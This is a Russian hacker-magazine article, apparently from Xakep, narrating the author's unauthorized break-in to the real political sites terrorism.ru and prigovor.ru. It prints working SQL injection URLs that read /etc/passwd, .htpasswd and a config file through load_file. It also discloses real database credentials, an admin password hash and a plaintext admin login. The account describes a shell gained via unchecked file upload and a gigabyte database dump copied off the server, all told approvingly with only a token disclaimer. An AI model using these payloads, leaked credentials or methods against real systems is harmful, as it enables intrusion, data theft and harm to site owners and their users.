В одном из прошлых выпусков я упоминал о неких политических силах, стремящихся использовать хакеров в своих целях. Поэтому перед тем, как начать статью, повторю еще раз: не стоит смешивать взлом и политику =). Дело в том, что в последнее время в Сети появилось огромное количество ресурсов сепаратистской и террористической направленности. А многие российские оппозиционные ресурсы нехило финансируются Западом. При таком раскладе нетрудно догадаться о содержании материалов на таких сайтах. Вот и в этот раз, случайно наткнувшись на скандально известный российский оппозиционный ресурс, я решил во что бы то ни стало порулить им =).

 

Разведка

Одним из вечеров я наткнулся в Сети на сообщение о том, что на крупном скандально известном ресурсе www.prigovor.ru опубликован очередной материал по делу ЮКОСа. Честно говоря, сам материал меня интересовал мало, поскольку предмет обсуждения достал уже по самое не хочу =). Но вот по линку прогуляться захотелось. Что и говорить, в популярности проекту было явно не занимать: в топе висели скандальные политические статьи, а основной фишкой была цитата Ходорковского. Я окинул взглядом индекс сайта и задумался, в глубине души мне почему-то стало обидно. Содержимое ресурса меня зацепило. Мгновенно возник план действий, и я принялся раскручивать объект (www.prigovor.ru) по отработанной схеме =).

Первым делом я уточнил на www.domainsdb.net список моих потенциальных клиентов :). Как выяснилось, на сервере находились достаточно занятные ресурсы:

  1. compromatru.com
  2. compromat.biz
  3. flb.ru
  4. kompromatru.com
  5. kompromat.biz
  6. politgeksogen.ru
  7. prigovor.ru
  8. prigovor.com
  9. prigovor.net
  10. reporters.ru
  11. terrorism.ru

Некоторые из линков попадались мне на глаза и ранее, это заставило меня задуматься. Поразмыслив, я прикинул, что возможно всеми проектами занимаются одни и те же люди, а это было уже куда интереснее. Получение доступа к серверу, на котором размещаются раскрученные скандальные ресурсы с четко выраженным политическим оттенком, представлялось мне рискованным мероприятием. Но, как говорится, волков бояться — в лес не ходить. Поэтому через минуту я уже был полностью вовлечен в процесс взлома =).

Не буду долго описывать анализ каждого из ресурсов. Тем более что многие из них, включая www.prigovor.ru, в техническом плане не представляли ничего интересного :(. Однако, когда очередь дошла до www.terrorism.ru, ситуация изменилась кардинальным образом. Внешне портал напоминал типичное террористическое веб-логово (наподобие «Кавказ-центра»): он был выполнен в арабском стиле, а в левом верхнем углу красовалась фотка Усамы. Но, несмотря на характерный специфический дизайн, прямой антиобщественной пропаганды сайт не содержал. Зато, как в последствии выяснилось, он содержал весьма привлекательный баг =). Побродив по линкам какое-то время, я наткнулся на типичный скул-инъект:

http://www.terrorism.ru/photo1.phtml?id=-1+union+select+1,2,3,4/*

Поначалу ничего хорошего найденная уязвимость не сулила (за исключением разве что приличного геморроя :)). Версия «мускула» была ниже пятой, что исключало возможность получения названий таблиц и колонок, а подобрать табличку вручную было не так-то просто. С админкой тоже вышел облом. Судя по всему, авториз осуществлялся не без помощи .htpasswd, доступа к которому у меня на тот момент не было. Оставалась маленькая надежда на наличие прав file_priv, которые могли мне позволить при помощи скул-запросов читать файлы на сервере. Правда, после первых попыток я понял, что, видимо, придется обломиться и здесь. Тем не менее после упорной ругани «мускул» все же согласился со мной и выплюнул наружу
весь /etc/passwd:

http://www.terrorism.ru/photo1.phtml?id=-1+union+select+1,2, AES_DECRYPT(AES_ENCRYPT(load_file(char(47,101,116,99,47, 112,97,115,115,119,100)), 0x71),0x71),4/*

Думаю, вопросов по этому поводу у тебя возникнуть не должно было. Про использование aes_decrypt()/aes_encrypt() и char() при проведении инъекций писалось не раз (в том числе и мной), поэтому не буду подробно на этом останавливаться.
Таким образом, файлики читать я уже мог. Но рыскать по серверу вслепую не совсем удобно, вернее, совсем неудобно. Благо путь к корню веб-каталога отыскался почти сразу (благодаря мату все того же «мускула»):

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/terrorism/photo1.phtml on line 114

Обнаруженная ранее админка лежала в стандартной дире /admin относительно корневого веб-каталога. Учитывая, что авториз в ней шел, скорее всего, через .htpasswd, я решил попробовать выудить оттуда админский пасс:

http://www.terrorism.ru/photo1.phtml?id=-1+union+select+1,2,AES_DECRYPT( AES_ENCRYPT(load_file(char(47,104,111,109,101,47, 116,101,114,114,111,114,105,115,109,47,97,100, 109,105,110,47,46,104,116,112,97,115,115, 119,100)),0x71),0x71),4/*

Увы, но мне достался лишь хэш (в стандартной утиле .htpasswd было включено шифрование):

admin:$apr1$AQ/…..$YrMyGEzlO4Mc2naPDYFk01

На удачу (под которой я подразумевал пароль вида «123456» или «admin» =) я особо не рассчитывал, но все же скормил добытый хэш брутеру, после чего с чистой совестью отравился поглощать пиво =).

 

Нанесение удара

Что же, раз в админку проход был закрыт, имело смысл поискать конфиги, которые могли содержать в себе аккаунты к базе. Один из таких конфигов я нашел без труда. Полный путь до него выглядел так: /home/terrorism/connect.phtml. Я сформировал нехитрый запрос:

http://www.terrorism.ru/photo1.phtml?id=-1+union+select+1,2, AES_DECRYPT(AES_ENCRYPT(load_file( char(47,104,111,109,101,47,116,101,114, 114,111,114,105,115,109,47,112,104,111,116, 111,49,46,112,104,116,109,108)), 0x71),0x71),4/*,

И получил долгожданный ответ: сорец скрипта и, как следствие, акк к БД на www.terrorism.ru:

login=sherebon
passwd=G5R1D10m
server=localhost

Залив в срочном порядке скул-клиент на один из поломанных серверов, я попробовал приконнектиться к базе:

http://www.my_server.com/images/sql.php?s=y&login= sherebon&passwd=G5R1D10m&server= localhost&port=3306

Но не тут-то было: соединение резалось, и меня посылали пройти лесом. Видимо, коннект к базе разрешался лишь локальным юзерам. Этот факт не мог не сказаться негативным образом на моем настроении, в результате чего желание поиметь ресурс, базу и админа (тьфу… то есть админку =)) усилилось многократно.

Тем временем в голове созрела очередная задумка. Осмотрев еще раз свою первоначальную жертву — www.prigovor.ru, в стандартной дире я также обнаружил админку (по адресу www.prigovor.ru/admin), но авториз в ней не был связан с .htpasswd. А сам скрипт логина, по всей видимости, взаимодействовал с базой данных. При таком раскладе, в случае правильного расположения звезд на небе и благоприятной фазы луны, у меня появлялась возможность стянуть админский аккаунт прямо из базы. Укомплектовавшись пивом, я принялся в очередной раз зверски пытать «мускул». И, как оказалось, не зря — потребовалась всего пара часов :). Удача заключалась в том, что юзер, под которым я раскручивал инъект, имел права на
доступ к базам других пользователей. Именно это и помогло мне найти табличку с админскими учетками от www.prigovor.ru:

Имя базы: prigovorru
Имя таблицы в базе: administrator

Сам запрос выглядел достаточно просто:

http://www.terrorism.ru/photo1.phtml?id=-1+union+select+1,2, concat(login,char(58),password),4+from+prigovorru.administrator+/*

Так или иначе, админский аккаунт был в моих руках:

admin:prigovora12.

Не теряя времени, я направился в админку. Залогинившись, я оказался внутри. К моему удивлению, админка обладала достаточно удобным и функциональным веб-интерфейсом. А заботливыми кодерами была предусмотрена возможность аплоада фоток без проверки расширения файла =). В общем, через минуту у меня уже был шелл, а через две — доступ к базе =). Не буду дразнить тебя (и админов хакнутого ресурса), и свои действия на сервере оставлю за кадром. Скажу только, что полный дамп базы перекочевал на мой забугорный сервер (кстати, весил дампик чуть более гига). Дефейсить ни один из сайтов я не стал, а просто тихо и незаметно удалился восвояси.

Оторвавшись от монитора, я довольно улыбнулся — на то были причины. В ходе взлома мной был получен контроль над несколькими довольно крупными скандально известными ресурсами, что само по себе не могло не радовать =). Тем не менее я пребывал в задумчивом состоянии. С одной стороны, можно было весело поглумиться над политическими ньюсами или, например, «подкорректировать» цитату Ходорковского, а с другой — вставить ифреймик и довольствоваться новыми загрузками троя. Но ни первое, ни второе не вызывало во мне энтузиазма. На ум пришли лишь очередные строчки все того же стихотворения:

Эх, Русь, моя ты матушка,
Ты родина слонов,
Дорог грунтовых с гравием,
И редких дураков…

 

Danger

Внимание! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут!


Полную версию статьи
читай в июльском номере Хакера!

Оставить мнение

Check Also

Хакер ищет авторов. Читатель? Хакер? Программист? Безопасник? Мы тебе рады!

Восемнадцать лет мы делаем лучшее во всем русскоязычном пространстве издание по IT и инфор…